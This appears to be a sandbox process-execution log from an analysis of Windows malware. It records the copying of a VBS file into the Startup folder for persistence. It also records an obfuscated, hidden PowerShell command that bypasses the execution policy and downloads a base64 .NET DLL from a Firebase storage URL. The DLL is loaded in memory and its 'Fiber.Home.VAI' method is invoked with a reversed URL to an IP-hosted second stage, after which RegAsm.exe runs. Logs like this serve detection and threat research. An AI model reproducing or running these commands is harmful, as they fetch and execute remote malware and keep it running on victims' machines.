cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
2136PING.EXE ping 127.0.0.1 -n 5
2204cmd.exe cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')"
2312powershell.exe powershell -command [System.IO.File]::Copy('C:\Users\test22\AppData\Local\Temp\HTML.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ HoÇOOqAÇavÇrm.vbs')
2356powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZgBpAHIAZQBiAGEAcwBlAHMAdABvAHIAYQBnAGUALgBnAG8AbwBnAGwAZQBhAHAAaQBzAC4AYwBvAG0ALwB2ADAALwBiAC8AcwBlAHIAdgBlAHIALQA1ADUANQBlADUALgBhAHAAcABzAHAAbwB0AC4AYwBvAG0ALwBvAC8AcgB1AG0AcABlAC4AdAB4AHQAPwBhAGwAdAA9AG0AZQBkAGkAYQAmAHQAbwBrAGUAbgA9ADIAMQBmADQAYwBhAGYAZQAtAGUAOQBhAGMALQA0ADAAOABjAC0AYQAyAGMAZAAtAGIAMgBmADkAMgA2AGYAOAAwADkANABhACcAOwBbAEIAeQB0AGUAWwBdAF0AIAAkAEQATABMACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBVAHIAbAApACkAOwBbAFMAeQBzAHQAZQBtAC4AQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKAAkAEQATABMACkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAJwBWAEEASQAnACkALgBJAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAJwB0AHgAdAAuAGUAbQBpAHQAbgB1AFIALwAyAC8AdwBvAGQAbgBpAHcALwAyADUAMQAuADgANwAxAC4ANgA0AC4AOAA5ADEALwAvADoAcAB0AHQAaAAnACkAKQA=';$OWjuxd= [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $oWjuxD
2632powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "$imageUrl = 'https://firebasestorage.googleapis.com/v0/b/server-555e5.appspot.com/o/rumpe.txt?alt=media&token=21f4cafe-e9ac-408c-a2cd-b2f926f8094a';[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString($imageUrl));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('txt.emitnuR/2/wodniw/251.871.64.891//:ptth'))"
2828RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
2980